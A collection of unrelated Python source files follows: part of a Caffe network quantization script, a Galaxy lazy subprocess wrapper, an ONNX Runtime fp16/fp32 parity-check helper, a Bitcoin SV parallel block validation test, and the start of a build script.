input_FL = input_bw - input_IL
#if layer.name=='conv1_1/conv':
# print input_IL,output_IL
#print layer.name
#if layer.name == 'conv1_1/conv':
# print output_IL
# continue
change_layer_bw(net_proto, layer.name, \
input_bw, input_FL, \
output_bw, output_FL, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#input_FL = output_FL
#quantize convolution layers in network
def quantize_net_conv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize fully connected layer in network
def quantize_net_fc(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'FcIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize deconvolution layer in network
def quantize_net_deconv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'DeconvolutionRistretto':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#read network spec in prototxt
def read_from_prototxt(ori_net_path):
net_proto = caffe_pb2.NetParameter()
fn = ori_net_path;
with open(fn) as f:
s = f.read()
txtf.Merge(s, net_proto)
return net_proto
#write network spec to prototxt
def write_to_prototxt(net_proto, out_net_path):
outf = out_net_path
#print 'writing', outf
with open(outf, 'w') as f:
f.write(str(net_proto))
#test network with no string printed
def test_qnet(net_path, caffemodel_path, imdb):
net = caffe.Net(net_path, caffemodel_path, caffe.TEST)
net.name = os.path.splitext(os.path.basename(caffemodel_path))[0]
ap = test_net_silent(net, imdb, max_per_image=args.max_per_image, vis=args.vis)
return ap
#print each layer name and spec
def print_net_layer_names(net):
print("Network layers:")
for name, layer in zip(net._layer_names, net.layers):
if layer.type == 'ConvolutionIVS' or layer.type == 'Convolution':
print("{:<30}: {:22s}({} blobs)".format(name, layer.type, len(layer.blobs)))
print dir(layer)
print layer.reshape
print layer.convolution_param
print net.layer[1].name
def mAP_worker(i, net_path, shared_dict, GPU_ID):
#caffe.set_mode_cpu()
#GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
#cfg.GPU_ID = GPU_ID
#caffe.set_device(GPU_ID)
#caffe.set_mode_gpu()
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
ap = float(check_output('./caffe-fast-rcnn/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(num_iters) + ' -gpu='+str(GPU_ID),shell=True))
#ap = test_qnet(net_path, args.caffemodel, imdb)
#ap = test_qnet(net_path, args.caffemodel, imdb)
shared_dict[i] = ap
def analyze_net_output_IL_worker(net_output_IL, net_input_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
#caffe.set_mode_cpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_output_IL_, net_input_IL_ = analyze_net_output_IL(net, net_proto)
for t in net_output_IL_.keys():
net_output_IL[t] = net_output_IL_[t]
for t in net_input_IL_.keys():
net_input_IL[t] = net_input_IL_[t]
def analyze_net_adder_multiplier_IL_worker(net_adder_IL, net_multiplier_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
#caffe.set_mode_cpu()
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
net_BAC = caffe.Net(args.prototxt_quantized_BAC, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_adder_IL_, net_multiplier_IL_ = analyze_net_adder_multiplier_IL(net_BAC, net_proto_BAC)
for t in net_adder_IL_.keys():
net_adder_IL[t] = net_adder_IL_[t]
for t in net_multiplier_IL_.keys():
net_multiplier_IL[t] = net_multiplier_IL_[t]
def analyze_net_param_IL_worker(net_param_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
net_param_IL_ = analyze_net_param_IL(net, net_proto)
for t in net_param_IL_.keys():
net_param_IL[t] = net_param_IL_[t]
if __name__ == '__main__':
args = parse_args()
num_iters = 4952
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
print('Using config:')
pprint.pprint(cfg)
convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
print 'Create quantized prototxt'
print 'Testing Full Precision Accuracy'
manager = multiprocessing.Manager()
shared_dict = manager.dict()
GPU1 = 0
GPU2 = 3
#p = multiprocessing.Process(target=mAP_worker, args=('FP-FP-FP-FP-FP', args.prototxt, shared_dict, GPU1))
timer = Timer()
timer.tic()
#p.start()
#p.join()
timer.toc()
#print ('Took {:.3f}s').format(timer.total_time)
#full_ap = shared_dict['FP-FP-FP-FP-FP']
full_ap = 0.706725
print 'Full precision accuracy : {}'.format(full_ap)
# Bit Width for Analyze
bw_range_conv = [8, 4] #bit width for convolution layers
bw_range_deconv = [32, 16, 8, 4, 2] #bit width for deconvolution layers
bw_range_fc = [32, 16, 8, 7, 6, 5, 4, 2] #bit width for fully connected layers
bw_range_output = [32, 16, 8, 4, 2] #bit width for layer input and output
bw_conv = 6 #just initial
bw_deconv = 6 #just initial
bw_fc = 6 #just initial
bw_output = 32 #just initial
bw_adder = 32 #just initial
bw_multiplier = 32 #just initial
convIL_reduction = -0
deconvIL_reduction = 0
fcIL_reduction = 0
actIL_reduction = 0
adderIL_reduction = 0
multIL_reduction = 0
print 'Analyzing network'
net_proto = read_from_prototxt(args.prototxt)
has_conv, has_deconv, has_fc = analyze_network(net_proto)
print 'Network Structure'
print 'CONV:{}, DECONV:{}, FC:{}'.format(has_conv, has_deconv, has_fc)
print '-----------------------------------'
net_proto = read_from_prototxt(args.prototxt_quantized)
print 'Analyzing network parameter IL'
net_param_IL = manager.dict()
p = multiprocessing.Process(target=analyze_net_param_IL_worker,
args=(net_param_IL, GPU1, ))
p.start()
p.join()
with open('param_analysis.json', 'w') as outfile:
param_analysis = dict()
param_analysis['net_param_IL'] = dict()
for t in net_param_IL.keys():
param_analysis['net_param_IL'][t] = net_param_IL[t]
json.dump(param_analysis, outfile)
# Analyze Convolution and DeConvolution Layers
if has_conv and False:
print 'Analyzing CONV and DECONV'
print '\tbit reduction\t accuracy'
i = -3
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto = read_from_prototxt(args.prototxt_quantized)
quantize_net_conv(net_proto, net_param_IL, bw_conv, i)
write_to_prototxt(net_proto, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=(str(i)+'-32-32-32-32',
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto = read_from_prototxt(args.prototxt_quantized)
quantize_net_conv(net_proto, net_param_IL, bw_conv, i+1)
write_to_prototxt(net_proto, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=(str(i+1)+'-32-32-32-32',
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict[str(j)+'-32-32-32-32'],timer.total_time)
for j in range(i, i+2):
if shared_dict[str(j)+'-32-32-32-32'] > (full_ap - args.error_margin) or i == 0:
convIL_reduction = j
not_found = False
break;
i = i + 2
#Make Final Quantized Prototxt
print 'Final Quantization Testing'
net_proto = read_from_prototxt(args.prototxt_quantized)
quantize_net_conv(net_proto, net_param_IL, bw_conv, convIL_reduction)
write_to_prototxt(net_proto, './temp.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-32-32', './temp.prototxt',
shared_dict, GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-32-32']
layer_ap = ap
#ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit CONV, {}bit FC, {}bit layer output'.format(bw_conv, bw_fc, bw_output)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit layer activations'.format(bw_output)
print 'Please fine-tune'
write_to_prototxt(net_proto, args.prototxt_quantized)
print 'Quantized Model saved to', args.prototxt_quantized
sys.exit(0)
print 'Create Bit-Accurate quantized prototxt'
convert_net_to_qnet_BAC_analysis(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Bit-Accurate quantized prototxt'
#print 'Analyzing network adder and multiplier'
net_adder_IL = manager.dict()
net_multiplier_IL = manager.dict()
if args.accumulator_analysis == None:
print 'Analyzing network adder and multiplier'
p = multiprocessing.Process(target=analyze_net_adder_multiplier_IL_worker,
args=(net_adder_IL, net_multiplier_IL, GPU1))
p.start()
p.join()
with open('accumulator_analysis.json', 'w') as outfile:
accumulator_analysis = dict()
accumulator_analysis['net_adder_IL'] = dict()
accumulator_analysis['net_multiplier_IL'] = dict()
for t in net_adder_IL.keys():
accumulator_analysis['net_adder_IL'][t] = net_adder_IL[t]
for t in net_multiplier_IL.keys():
accumulator_analysis['net_multiplier_IL'][t] = net_multiplier_IL[t]
json.dump(accumulator_analysis, outfile)
else:
print 'Loading network adder and multiplier analysis file'
with open(args.accumulator_analysis) as json_data:
accumulator_analysis = json.load(json_data)
for t in accumulator_analysis['net_adder_IL'].keys():
net_adder_IL[t] = accumulator_analysis['net_adder_IL'][t]
for t in accumulator_analysis['net_multiplier_IL'].keys():
net_multiplier_IL[t] = accumulator_analysis['net_multiplier_IL'][t]
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
print 'Analyzing layer multiplier'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i),
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i+1, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i+1),
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-32-'+str(j)],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-32-'+str(j)] > (layer_ap - 0.005):
bw_multiplier = j
not_found = False
break;
i = i + 2
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, bw_multiplier, multIL_reduction)
write_to_prototxt(net_proto_BAC, args.prototxt_quantized_BAC)
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer multiplier'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_multiplier(net_BAC, net_proto_BAC, net_multiplier_IL, bw)
# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_multiplier = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Analyzing layer adder'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i)+'-32',
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i+1, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i+1)+'-32',
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-'+str(j)+'-32'],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-'+str(j)+'-32'] > (layer_ap - 0.005):
bw_adder = j
not_found = False
break;
i = i + 2
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer adder'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_adder(net_BAC, net_proto_BAC, net_adder_IL, bw)
# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_adder = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Create Final Bit-Accurate quantized prototxt'
convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_final = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Final Bit-Accurate quantized prototxt'
quantize_net_conv(net_proto_final, net_param_IL, bw_conv, convIL_reduction)
quantize_net_deconv(net_proto_final, net_param_IL, bw_conv, deconvIL_reduction)
quantize_net_fc(net_proto_final, net_param_IL, bw_fc, fcIL_reduction)
quantize_net_output(net_proto_final, net_output_IL, net_input_IL, bw_output, actIL_reduction)
quantize_net_multiplier(net_proto_final, net_multiplier_IL, bw_multiplier, multIL_reduction)
quantize_net_adder(net_proto_final, net_adder_IL, bw_adder, adderIL_reduction)
write_to_prototxt(net_proto_final, './temp_f.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-DQ-DQ', './temp_f.prototxt',
shared_dict,GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-DQ-DQ']
#ap = test_qnet('./temp_f.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit adder, {}bit multiplier,'.format(bw_adder, bw_multiplier)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print '{}bit adder'.format(bw_adder)
print '{}bit multiplier'.format(bw_multiplier)
print 'Please fine-tune'
write_to_prototxt(net_proto_final, args.prototxt_quantized_BAC)
print 'Bit-Accurate Quantized Model saved to', args.prototxt_quantized_BAC
GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
|
lazy_process.py
|
import threading
import time
import subprocess
class LazyProcess( object ):
""" Abstraction describing a command line launching a service - probably
as needed as functionality is accessed in Galaxy.
"""
def __init__( self, command_and_args ):
self.command_and_args = command_and_args
self.thread_lock = threading.Lock()
self.allow_process_request = True
self.process = None
def start_process( self ):
with self.thread_lock:
if self.allow_process_request:
self.allow_process_request = False
t = threading.Thread(target=self.__start)
t.daemon = True
t.start()
def __start(self):
with self.thread_lock:
self.process = subprocess.Popen( self.command_and_args, close_fds=True )
def shutdown( self ):
with self.thread_lock:
self.allow_process_request = False
if self.running:
self.process.terminate()
time.sleep(.01)
if self.running:
self.process.kill()
@property
def running( self ):
return self.process and not self.process.poll()
class NoOpLazyProcess( object ):
""" LazyProcess abstraction meant to describe potentially optional
services, in those cases where one is not configured or valid, this
class can be used in place of LazyProcess.
"""
def start_process( self ):
return
def shutdown( self ):
return
@property
def running( self ):
return False
|
parity_check_helper.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# This script helps debugging parity issue for two same onnx models with fp16 and fp32 format
# Please build ORT with --cmake_extra_defines onnxruntime_DEBUG_NODE_INPUTS_OUTPUTS=ON
import math
import multiprocessing
import numpy
import os
import torch
from pathlib import Path
from onnx import numpy_helper, TensorProto
from gpt2_helper import Gpt2Helper
from benchmark_helper import create_onnxruntime_session
NON_ZERO_VALUE = str(1)
ZERO_VALUE = str(0)
def environ_setting_nodes(node_name_filter=None, node_type_filter=None):
# Set I/O data as default
os.environ["ORT_DEBUG_NODE_IO_DUMP_SHAPE_DATA"] = ZERO_VALUE
os.environ["ORT_DEBUG_NODE_IO_DUMP_INPUT_DATA"] = NON_ZERO_VALUE
os.environ["ORT_DEBUG_NODE_IO_DUMP_OUTPUT_DATA"] = NON_ZERO_VALUE
if node_name_filter is not None:
os.environ["ORT_DEBUG_NODE_IO_NAME_FILTER"] = node_name_filter
elif node_type_filter is not None:
os.environ["ORT_DEBUG_NODE_IO_OP_TYPE_FILTER"] = node_type_filter
else:
os.environ["ORT_DEBUG_NODE_IO_DUMPING_DATA_TO_FILES_FOR_ALL_NODES_IS_OK"] = NON_ZERO_VALUE
def environ_setting_paths(output_path):
# Set dumping values to files as default
os.environ["ORT_DEBUG_NODE_IO_DUMP_DATA_DESTINATION"] = "files"
os.environ["ORT_DEBUG_NODE_IO_OUTPUT_DIR"] = output_path
def environ_reset():
for flag in [
"ORT_DEBUG_NODE_IO_DUMP_SHAPE_DATA", "ORT_DEBUG_NODE_IO_DUMP_INPUT_DATA",
"ORT_DEBUG_NODE_IO_DUMP_OUTPUT_DATA", "ORT_DEBUG_NODE_IO_NAME_FILTER", "ORT_DEBUG_NODE_IO_OP_TYPE_FILTER",
"ORT_DEBUG_NODE_IO_DUMP_DATA_TO_FILES", "ORT_DEBUG_NODE_IO_OUTPUT_DIR",
"ORT_DEBUG_NODE_IO_DUMPING_DATA_TO_FILES_FOR_ALL_NODES_IS_OK"
]:
if flag in os.environ:
del os.environ[flag]
def inference(model_path, dummy_inputs, outputs_path, use_gpu):
environ_reset()
environ_setting_nodes()
environ_setting_paths(outputs_path)
session = create_onnxruntime_session(model_path, use_gpu, enable_all_optimization=False)
Gpt2Helper.onnxruntime_inference(session, dummy_inputs)
def generate_outputs_files(model_path, dummy_inputs, outputs_path, use_gpu):
dir_path = Path(outputs_path)
if dir_path.exists() and dir_path.is_dir():
import shutil
shutil.rmtree(outputs_path)
dir_path.mkdir(parents=True, exist_ok=True)
process = multiprocessing.Process(target=inference, args=(model_path, dummy_inputs, outputs_path, use_gpu))
process.start()
process.join()
def post_processing(outputs_path, outputs_path_other):
# Compare outputs with e.g. fp16 and fp32
record = {}
if_close = {}
import glob
for filename in glob.glob(os.path.join(outputs_path, '*.tensorproto')):
filename_other = os.path.join(outputs_path_other, Path(filename).name)
if not os.path.exists(filename_other):
continue
with open(filename, 'rb') as f:
tensor = TensorProto()
tensor.ParseFromString(f.read())
array = numpy_helper.to_array(tensor)
with open(filename_other, 'rb') as f:
tensor_other = TensorProto()
tensor_other.ParseFromString(f.read())
array_other = numpy_helper.to_array(tensor_other)
if array_other.size == 0:
continue
diff = numpy.average(numpy.abs(array_other - array) / (numpy.abs(array_other) + 1e-6))
if math.isnan(diff):
continue
record[Path(filename).name.split(".")[0]] = diff
if_close[Path(filename).name.split(".")[0]] = numpy.allclose(array, array_other, rtol=1e-04, atol=1e-04)
results = [f"Node\tDiff\tClose"]
for k, v in sorted(record.items(), key=lambda x: x[1], reverse=True):
results.append(f"{k}\t{v}\t{if_close[k]}")
for line in results:
print(line)
if __name__ == '__main__':
# Below example shows how to use this helper to investigate parity issue of gpt-2 fp32 and fp16 onnx model
# Please build ORT with --cmake_extra_defines onnxruntime_DEBUG_NODE_INPUTS_OUTPUTS=ON !!
multiprocessing.set_start_method('spawn')
# Generate Inputs
sequence_length = 8
past_sequence_length = 8
batch_size = 5
dummy_inputs_fp16 = Gpt2Helper.get_dummy_inputs(batch_size,
past_sequence_length,
sequence_length,
12,
768,
12,
50257,
device=torch.device("cpu"),
float16=True)
dummy_inputs_fp32 = dummy_inputs_fp16.to_fp32()
# Get GPT-2 model from huggingface using convert_to_onnx.py
os.system('python convert_to_onnx.py -m gpt2 --output gpt2_fp32.onnx -o -p fp32 --use_gpu')
os.system('python convert_to_onnx.py -m gpt2 --output gpt2_fp16.onnx -o -p fp16 --use_gpu')
# Specify the directory to dump the node's I/O
outputs_path_fp32_gpu = "./fp32_gpu"
outputs_path_fp16_gpu = "./fp16_gpu"
generate_outputs_files("./gpt2_fp32.onnx", dummy_inputs_fp32, outputs_path_fp32_gpu, use_gpu=True)
generate_outputs_files("./gpt2_fp16.onnx", dummy_inputs_fp16, outputs_path_fp16_gpu, use_gpu=True)
# Compare each node's I/O value and sort based on average rtol
post_processing(outputs_path_fp16_gpu, outputs_path_fp32_gpu)
|
bsv-pbv-submitblock.py
|
#!/usr/bin/env python3
# Copyright (c) 2019 Bitcoin Association
# Distributed under the Open BSV software license, see the accompanying file LICENSE.
"""
We will test the following situation where block 1 is the tip and three blocks
are sent for parallel validation:
1
/ | \
2 3 4
Blocks 2,4 are hard to validate and block 3 is easy to validate.
- Blocks 2,3 are sent via p2p.
- Block 4 is submitted via rpc command submitblock.
Block 3 should be active in the end because it was easiest to validate and
therefore won the validation race.
*This test is similar to bsv-pbv-submitminingsolution.py which uses different RPC call to
submit the block.
Additionally this test also checks that blocks with same height but later arrival
are also announced to the network after being validated. (lines marked with ***
at the beginning of comments)
"""
import threading
from test_framework.blocktools import prepare_init_chain
from test_framework.util import (
assert_equal,
p2p_port,
get_rpc_proxy,
rpc_url,
get_datadir_path,
wait_until
)
from test_framework.mininode import (
NetworkThread,
NodeConn,
NodeConnCB,
msg_block,
msg_sendcmpct,
msg_getheaders,
ToHex,
CInv
)
from test_framework.test_framework import BitcoinTestFramework, ChainManager
from bsv_pbv_common import (
wait_for_waiting_blocks,
wait_for_validating_blocks
)
class PBVSubmitBlock(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.chain = ChainManager()
self.extra_args = [["-whitelist=127.0.0.1"]]
def run_test(self):
block_count = 0
# Create a P2P connections
node0 = NodeConnCB()
connection0 = NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0)
node0.add_connection(connection0)
node1 = NodeConnCB()
connection1 = NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node1)
node1.add_connection(connection1)
# *** Prepare node connection for early announcements testing
node2 = NodeConnCB()
node2.add_connection(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node2))
NetworkThread().start()
# wait_for_verack ensures that the P2P connection is fully up.
node0.wait_for_verack()
node1.wait_for_verack()
# *** Activate early announcement functionality for this connection
# After this point the early announcements are not received yet -
# we still need to set latest announced block (CNode::pindexBestKnownBlock)
# which is set for e.g. by calling best headers message with locator
# set to non-null
node2.wait_for_verack()
node2.send_message(msg_sendcmpct(announce=True))
self.chain.set_genesis_hash(int(self.nodes[0].getbestblockhash(), 16))
_, outs, block_count = prepare_init_chain(self.chain, 101, 1, block_0=False, start_block=0, node=node0)
out = outs[0]
self.log.info("waiting for block height 101 via rpc")
self.nodes[0].waitforblockheight(101)
tip_block_num = block_count - 1
# adding extra transactions to get different block hashes
block2_hard = self.chain.next_block(block_count, spend=out, extra_txns=8)
block_count += 1
self.chain.set_tip(tip_block_num)
block3_easier = self.chain.next_block(block_count, spend=out, extra_txns=2)
block_count += 1
self.chain.set_tip(tip_block_num)
block4_hard = self.chain.next_block(block_count, spend=out, extra_txns=10)
block_count += 1
# send three "hard" blocks, with waitaftervalidatingblock we artificially
# extend validation time.
self.log.info(f"hard block2 hash: {block2_hard.hash}")
self.nodes[0].waitaftervalidatingblock(block2_hard.hash, "add")
self.log.info(f"hard block4 hash: {block4_hard.hash}")
self.nodes[0].waitaftervalidatingblock(block4_hard.hash, "add")
# make sure block hashes are in waiting list
wait_for_waiting_blocks({block2_hard.hash, block4_hard.hash}, self.nodes[0], self.log)
# *** Complete early announcement setup by sending getheaders message
# with a non-null locator (pointing to the last block that we know
# of on python side - we claim that we know of all the blocks that
# bitcoind node knows of)
#
# We also set on_cmpctblock handler as early announced blocks are
# announced via compact block messages instead of inv messages
node2.send_and_ping(msg_getheaders(locator_have=[int(self.nodes[0].getbestblockhash(), 16)]))
receivedAnnouncement = False
waiting_for_announcement_block_hash = block2_hard.sha256
def on_cmpctblock(conn, message):
nonlocal receivedAnnouncement
message.header_and_shortids.header.calc_sha256()
if message.header_and_shortids.header.sha256 == waiting_for_announcement_block_hash:
receivedAnnouncement = True
node2.on_cmpctblock = on_cmpctblock
# send one block via p2p and one via rpc
node0.send_message(msg_block(block2_hard))
# *** make sure that we receive announcement of the block before it has
# been validated
wait_until(lambda: receivedAnnouncement)
# making rpc call submitblock in a separate thread because waitaftervalidation is blocking
# the return of submitblock
submitblock_thread = threading.Thread(target=self.nodes[0].submitblock, args=(ToHex(block4_hard),))
submitblock_thread.start()
# because self.nodes[0] rpc is blocked we use another rpc client
rpc_client = get_rpc_proxy(rpc_url(get_datadir_path(self.options.tmpdir, 0), 0), 0,
coveragedir=self.options.coveragedir)
wait_for_validating_blocks({block2_hard.hash, block4_hard.hash}, rpc_client, self.log)
# *** prepare to intercept block3_easier announcement - it will not be
# announced before validation is complete as early announcement is
# limited to announcing one block per height (siblings are ignored)
# but after validation is complete we should still get the announcing
# compact block message
receivedAnnouncement = False
waiting_for_announcement_block_hash = block3_easier.sha256
self.log.info(f"easy block3 hash: {block3_easier.hash}")
node1.send_message(msg_block(block3_easier))
# *** Make sure that we receive compact block announcement of the block
# after the validation is complete even though it was not the first
# block that was received by bitcoind node.
#
# Also make sure that we receive inv announcement of the block after
# the validation is complete by the nodes that are not using early
# announcement functionality.
wait_until(lambda: receivedAnnouncement)
node0.wait_for_inv([CInv(CInv.BLOCK, block3_easier.sha256)])
# node 1 was the sender but receives inv for block non the less
# (with early announcement that's not the case - sender does not receive the announcement)
node1.wait_for_inv([CInv(CInv.BLOCK, block3_easier.sha256)])
rpc_client.waitforblockheight(102)
assert_equal(block3_easier.hash, rpc_client.getbestblockhash())
# now we can remove waiting status from blocks and finish their validation
rpc_client.waitaftervalidatingblock(block2_hard.hash, "remove")
rpc_client.waitaftervalidatingblock(block4_hard.hash, "remove")
submitblock_thread.join()
# wait till validation of block or blocks finishes
node0.sync_with_ping()
# easier block should still be on tip
assert_equal(block3_easier.hash, self.nodes[0].getbestblockhash())
if __name__ == '__main__':
PBVSubmitBlock().main()
|
build.py
|
#!/usr/bin/env python3
# Copyright (c) 2020-2021, Videonetics Technology Pvt Ltd. All rights reserved.
# mypy: ignore-errors
import argparse
import glob
import logging
import os
import pathlib
import platform
from posixpath import join
import shutil
import signal
import subprocess
import sys
import time
import traceback
import venv
import zipfile
from distutils.dir_util import copy_tree
from subprocess import PIPE, Popen
from threading import Thread
from urllib.parse import urlparse
from urllib.request import urlretrieve
from dataclasses import dataclass
@dataclass
class Flags:
module_name :str
cwd: str = ""
virtual_env_path: str = ""
dist_dir: str = ""
